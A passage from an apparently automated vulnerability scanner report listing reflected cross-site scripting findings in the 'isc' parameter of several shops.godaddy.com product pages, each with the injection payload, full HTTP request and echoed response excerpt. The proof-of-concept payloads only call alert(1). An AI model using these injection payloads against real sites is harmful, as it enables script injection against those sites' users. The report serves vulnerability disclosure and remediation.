The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73226"%3balert(1)//8a48a0b359e was submitted in the isc parameter. This input was echoed as 73226";alert(1)//8a48a0b359e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A09273226"%3balert(1)//8a48a0b359e&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 177018
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=533i2z55uu1dxfvfftthjh55; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:37 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
j_url_mya="https://mya.godaddy.com/";var pcj_url_img="http://img5.wsimg.com/";var pcj_url_cmnty="http://community.godaddy.com/";var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT03A09273226";alert(1)//8a48a0b359e&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";var pcj_isMgr = false;var pcj_idpredirect = "";var pcj_ssoTargetKey = "target";var pcj_isCart = false;var pcj_isCmnty = false;var pcj_cname = "ShopperId1";var
...[SNIP]...

3.206. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea was submitted in the isc parameter. This input was echoed as 1d886"style="x:expression(alert(1))"2c644fcb8ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A0921d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 179107
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=m3otdjbtjn0j1jaaieauxc55; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:24 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT03A0921d886"style="x:expression(alert(1))"2c644fcb8ea&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.207. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e038"%3balert(1)//b62314b1d25 was submitted in the isc parameter. This input was echoed as 5e038";alert(1)//b62314b1d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C0215e038"%3balert(1)//b62314b1d25&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 180898
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=mznsn145q0mxr0vyei2mbbbu; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:32 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
rl_mya="https://mya.godaddy.com/";
var pcj_url_img="http://img5.wsimg.com/";
var pcj_url_cmnty="http://community.godaddy.com/";
var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C0215e038";alert(1)//b62314b1d25&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";
var pcj_isMgr = false;
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_isCmnty = false;
var pcj_cname = "ShopperId1
...[SNIP]...

3.208. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3 was submitted in the isc parameter. This input was echoed as 214f7"style="x:expression(alert(1))"bebbc1845c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C021214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 182987
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=r5khpde40hdl1y55kfe0vo55; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:19 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C021214f7"style="x:expression(alert(1))"bebbc1845c3&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.209. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94034"style%3d"x%3aexpression(alert(1))"3c8f6d48244 was submitted in the isc parameter. This input was echoed as 94034"style="x:expression(alert(1))"3c8f6d48244 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C02194034"style%3d"x%3aexpression(alert(1))"3c8f6d48244&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173188
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=2zrwhnzamnwxhzezt4jdh3v5; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:02 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C02194034"style="x:expression(alert(1))"3c8f6d48244&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.210. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6439"%3balert(1)//fdb982fc19a was submitted in the isc parameter. This input was echoed as c6439";alert(1)//fdb982fc19a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C021c6439"%3balert(1)//fdb982fc19a&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 170552
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=djnvm2vqgewrps45qyay4j45; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:11 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
j_url_mya="https://mya.godaddy.com/";var pcj_url_img="http://img5.wsimg.com/";var pcj_url_cmnty="http://community.godaddy.com/";var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021c6439";alert(1)//fdb982fc19a&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";var pcj_isMgr = false;var pcj_idpredirect = "";var pcj_ssoTargetKey = "target";var pcj_isCart = false;var pcj_isCmnty = false;var pcj_cname = "ShopperId1";var
...[SNIP]...

3.211. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Myasiatrade-com/Flotap-t1000/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8266"style%3d"x%3aexpression(alert(1))"29256dd5172 was submitted in the isc parameter. This input was echoed as e8266"style="x:expression(alert(1))"29256dd5172 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e8266"style%3d"x%3aexpression(alert(1))"29256dd5172&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 174449
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=i1pwcp55ajzxrbn5oho1so45; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:40 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C021e8266"style="x:expression(alert(1))"29256dd5172&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.212. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Myasiatrade-com/Flotap-t1000/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5995"%3balert(1)//7fede595aaa was submitted in the isc parameter. This input was echoed as e5995";alert(1)//7fede595aaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e5995"%3balert(1)//7fede595aaa&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 172360
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=a0k3unrokggtlhrq10nlirez; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:52 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
rl_mya="https://mya.godaddy.com/";
var pcj_url_img="http://img5.wsimg.com/";
var pcj_url_cmnty="http://community.godaddy.com/";
var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021e5995";alert(1)//7fede595aaa&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";
var pcj_isMgr = false;
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_isCmnty = false;
var pcj_cname = "ShopperId1
...[SNIP]...

3.213. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c77"%3balert(1)//4ff28e1f667 was submitted in the isc parameter. This input was echoed as b3c77";alert(1)//4ff28e1f667 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092b3c77"%3balert(1)//4ff28e1f667&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 171242
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=bg31by45uyjgfz3fgyire0q0; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:19:00 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:19:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:19:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
j_url_mya="https://mya.godaddy.com/";var pcj_url_img="http://img5.wsimg.com/";var pcj_url_cmnty="http://community.godaddy.com/";var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT03A092b3c77";alert(1)//4ff28e1f667&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";var pcj_isMgr = false;var pcj_idpredirect = "";var pcj_ssoTargetKey = "target";var pcj_isCart = false;var pcj_isCmnty = false;var pcj_cname = "ShopperId1";var
...[SNIP]...

3.214. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256 was submitted in the isc parameter. This input was echoed as 563bb"style="x:expression(alert(1))"c4bb47fd256 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/?isc=GPPT03A092563bb"style%3d"x%3aexpression(alert(1))"c4bb47fd256&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173331
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=mq0cnx45momxjiqzprsxvxbu; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Fri, 19-Nov-2010 23:18:48 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Fruta+Planta+30+Capsules+%7c+Reduce+Weight+Fruta+Planta,%2fNetnutri-com%2fFruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944%2f?plv=false,980944|; expires=Tue, 14-Dec-2010 23:18:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:18:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT03A092563bb"style="x:expression(alert(1))"c4bb47fd256&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.215. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c was submitted in the isc parameter. This input was echoed as 1ad87"style="x:expression(alert(1))"ef69d8537c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C0211ad87"style%3d"x%3aexpression(alert(1))"ef69d8537c&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 169969
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
